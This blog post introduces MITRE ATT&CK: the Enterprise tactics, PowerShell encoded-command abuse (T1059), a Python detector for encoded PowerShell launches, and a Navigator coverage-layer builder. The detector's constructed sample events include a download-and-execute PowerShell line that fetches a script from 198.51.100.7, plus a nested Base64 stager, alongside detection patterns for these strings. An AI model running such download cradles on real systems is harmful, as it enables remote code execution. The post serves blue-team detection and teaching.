March 6, 2026 | cybersecurity, MITRE ATT&CK, threat intelligence

Introduction to MITRE ATT&CK: the map of cyber attacks

What is MITRE ATT&CK?

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a publicly available knowledge base that catalogs the tactics and techniques adversaries have been observed using in real intrusions. It started in 2013 as an internal MITRE Corporation research project, was published in 2015, and has since become the de facto common language for security teams worldwide.

Unlike a vulnerability catalog such as CVE, ATT&CK does not describe vulnerabilities or misconfigurations: it describes attacker behavior. Each technique entry is backed by references to real intrusions, lists the groups and software seen using it, and comes with the detection data sources and mitigations that apply. That makes it equally useful for red teams (emulating a specific adversary) and blue teams (measuring what they can detect).

The 14 Enterprise Tactics

The Enterprise matrix is the most widely used one: it covers Windows, macOS, Linux, cloud services, network devices and containers (separate matrices exist for Mobile and ICS). It is organized into 14 tactics, each representing a high-level objective of the attacker; the techniques and sub-techniques listed under a tactic are the concrete ways that objective is achieved:

  1. Reconnaissance — Gathering information about the target before the attack
  2. Resource Development — Acquiring infrastructure, accounts and tools
  3. Initial Access — How the attacker enters the network (phishing, public exploits)
  4. Execution — Running malicious code on the target system
  5. Persistence — Mechanisms to maintain access even after a reboot
  6. Privilege Escalation — Obtaining higher-level permissions
  7. Defense Evasion — Techniques to avoid detection
  8. Credential Access — Theft of credentials and hashes
  9. Discovery — Exploration of the compromised environment
  10. Lateral Movement — Moving from one system to another in the network
  11. Collection — Gathering data of interest
  12. Command and Control (C2) — Communication with compromised systems
  13. Exfiltration — Extracting stolen data to the outside
  14. Impact — Final actions: encryption, deletion, sabotage
[Figure: MITRE ATT&CK Enterprise Matrix (click to enlarge)]

A practical example: T1059 — Command and Scripting Interpreter

One of the most widely used techniques is T1059, under the Execution tactic. It has one sub-technique per interpreter (T1059.001 PowerShell, T1059.003 Windows Command Shell, T1059.004 Unix Shell, T1059.006 Python, among others). Attackers abuse these legitimate, already-present and signed interpreters to run malicious code, often staged straight into memory so that no file is ever written to disk. A typical PowerShell launch looks like this:

powershell -enc [Base64EncodedPayload]

Here -enc is the short form of -EncodedCommand: the payload is the Base64 encoding of the script as UTF-16LE text (not UTF-8), so the command line shows no readable cmdlets and a naive Base64 decode yields the script's characters interleaved with null bytes.

How to defend:
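As an added example (not code from the original post or from MITRE), the detector below turns the encoded-command pattern above into a check a blue team can run over process-creation telemetry: the command-line field of Windows Security event 4688 (with command-line auditing enabled) or Sysmon event ID 1. It finds -EncodedCommand launches, decodes the UTF-16LE Base64 payload and rates the result. The sample records, the 198.51.100.7 address and the severity thresholds are constructed for the example.

```python
"""Flag encoded PowerShell launches (T1059.001) in process-creation records.

Added example for this post, not code from the original page or from MITRE.
The records below are constructed, not real telemetry.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so enumerate the prefixes; "-ex" (ExecutionPolicy) must not match.
_ENC_PREFIXES = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENCODED_RE = re.compile(
    r"(?:^|\s)[-/](?:" + _ENC_PREFIXES + r")\s+([A-Za-z0-9+/=]{4,})", re.IGNORECASE
)

# Launch flags that hide the window or neutralise policy; common in droppers.
LAUNCH_FLAGS_RE = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden|-(?:ex|exec|ep|executionpolicy)\s+bypass"
    r"|-nop(?:rofile)?\b|-noni(?:nteractive)?\b",
    re.IGNORECASE,
)

# Once decoded, these point at download-and-execute or a second encoding layer.
SCRIPT_INDICATORS = {
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
    "download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.IGNORECASE
    ),
    "nested-base64": re.compile(r"frombase64string", re.IGNORECASE),
}


def decode_payload(b64: str):
    """Decode an -EncodedCommand argument; None if it is not valid UTF-16LE Base64."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:  # bad padding or alphabet (binascii.Error is a ValueError)
        return None
    if len(raw) % 2:  # UTF-16LE is two bytes per code unit; odd length = truncated
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze(command_line: str):
    """Return None for lines without an encoded command, else a verdict dict."""
    # Gate on the interpreter name. A renamed powershell.exe evades this, so a
    # real pipeline should gate on the PE's OriginalFileName or hash instead.
    if not re.search(r"powershell|pwsh", command_line, re.IGNORECASE):
        return None
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    script = decode_payload(m.group(1))
    hits = []
    if script is None:
        hits.append("undecodable-payload")
    else:
        hits += [name for name, rx in SCRIPT_INDICATORS.items() if rx.search(script)]
    if LAUNCH_FLAGS_RE.search(command_line):
        hits.append("suspicious-launch-flags")
    script_hits = [h for h in hits if h in SCRIPT_INDICATORS]
    severity = "high" if script_hits else ("medium" if hits else "low")
    return {"script": script, "hits": hits, "severity": severity}


def scan(events):
    """Run analyze() over records; return one verdict per flagged record."""
    results = []
    for ev in events:
        verdict = analyze(ev["command_line"])
        if verdict:
            results.append({"pid": ev["pid"], **verdict})
    return results


def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (Base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"pid": 4120, "command_line": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc "
     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')")},
    {"pid": 4131, "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
    {"pid": 4140, "command_line": "powershell.exe -enc "
     + _enc("Get-Service | Where-Object Status -eq 'Running'")},
    {"pid": 4155, "command_line": "cmd.exe /c powershell -e "
     + _enc("$p=[Convert]::FromBase64String($env:X);IEX([Text.Encoding]::Unicode.GetString($p))")},
    {"pid": 4160, "command_line": "powershell.exe -ex bypass -enc QUJD"},  # payload truncated
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(r["pid"], r["severity"], r["hits"], (r["script"] or "")[:60])
```

Two caveats a practitioner should keep in mind. First, command-line inspection only sees the outer layer: turn on PowerShell Script Block Logging (event 4104 in Microsoft-Windows-PowerShell/Operational), which records the script after all decoding, so nested FromBase64String stages are captured too. Second, the "low" verdict for an encoded but harmless script is still worth a look in environments where administrators never use -EncodedCommand; the baseline decides the threshold, not the example.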

Why use ATT&CK in practice

ATT&CK is useful at every level of a security team, from the analyst labeling an alert with a technique ID to the lead measuring detection coverage across the whole matrix.

Tools like ATT&CK Navigator let you visualize this on a color-coded copy of the matrix: you load a "layer" that scores each technique, and the map shows at a glance which techniques you can detect and which you cannot.
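As an added example (not code from the original post or from the Navigator project), here is how a coverage inventory becomes a Navigator layer file. The input is a dict of technique ID to coverage status, the kind of list a detection engineering team keeps; the output is layer JSON that Navigator opens via "Open Existing Layer" and colors through its gradient. The coverage inventory is constructed, and the version strings in `versions` are assumptions to be replaced with the ATT&CK and Navigator releases you actually use.

```python
"""Build an ATT&CK Navigator layer from a detection-coverage inventory.

Added example for this post, not code from the original page or from MITRE.
The inventory and the version strings are constructed/assumed.
"""
import json
import re

TECHNIQUE_ID_RE = re.compile(r"^T\d{4}(?:\.\d{3})?$")

# Score per status; Navigator maps scores onto the gradient defined below.
STATUS_SCORE = {"none": 0, "partial": 50, "detected": 100}
STATUS_COLOR = {"none": "#ff6666", "partial": "#ffe766", "detected": "#8ec843"}

# Constructed inventory: technique ID -> (status, note on the data source).
COVERAGE = {
    "T1059.001": ("detected", "script block logging (4104) + process creation"),
    "T1059.003": ("partial", "process creation only; no command-line auditing on servers"),
    "T1566.001": ("detected", "mail gateway attachment sandboxing"),
    "T1078": ("partial", "alerts only on domain admin logons"),
    "T1003.001": ("none", "no LSASS access telemetry"),
    "T1021.001": ("detected", "RDP logon type 10 correlation"),
}


def validate_technique_id(tid: str) -> bool:
    """True for a well-formed ATT&CK technique or sub-technique ID (T1234 / T1234.001)."""
    return bool(TECHNIQUE_ID_RE.match(tid))


def build_layer(coverage: dict, name: str) -> dict:
    """Return a Navigator layer (layer format 4.x) dict for the coverage map."""
    techniques = []
    for tid, (status, note) in sorted(coverage.items()):
        if not validate_technique_id(tid):
            raise ValueError(f"not an ATT&CK technique ID: {tid!r}")
        if status not in STATUS_SCORE:
            raise ValueError(f"unknown status {status!r} for {tid}")
        techniques.append({
            "techniqueID": tid,
            "score": STATUS_SCORE[status],
            "comment": f"{status}: {note}",
            "enabled": True,
            "showSubtechniques": True,
        })
    return {
        "name": name,
        "domain": "enterprise-attack",
        # Assumed versions; set them to the releases you run.
        "versions": {"attack": "16", "navigator": "5.1.0", "layer": "4.5"},
        "description": "Detection coverage: score 0 = no detection, 100 = detected",
        "techniques": techniques,
        "gradient": {
            "colors": [STATUS_COLOR["none"], STATUS_COLOR["partial"], STATUS_COLOR["detected"]],
            "minValue": 0,
            "maxValue": 100,
        },
        "legendItems": [{"label": s, "color": c} for s, c in STATUS_COLOR.items()],
    }


def layer_json(layer: dict) -> str:
    """Serialize a layer for Navigator (indented so it diffs cleanly in git)."""
    return json.dumps(layer, indent=2)


def coverage_summary(coverage: dict) -> dict:
    """Count techniques per status, the numbers a coverage review reports."""
    counts = {s: 0 for s in STATUS_SCORE}
    for status, _ in coverage.values():
        counts[status] += 1
    return counts


if __name__ == "__main__":
    layer = build_layer(COVERAGE, "Detection coverage 2026-03")
    with open("coverage-layer.json", "w", encoding="utf-8") as fh:
        fh.write(layer_json(layer))
    print(coverage_summary(COVERAGE))
```

Keeping the inventory (not the generated JSON) as the source of truth, and regenerating the layer in CI, means the matrix never drifts from what the detection rules actually cover; the ID check catches the typos ("T1059.01", "1059") that otherwise silently drop a technique from the map.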

Questions about MITRE ATT&CK? Contact me.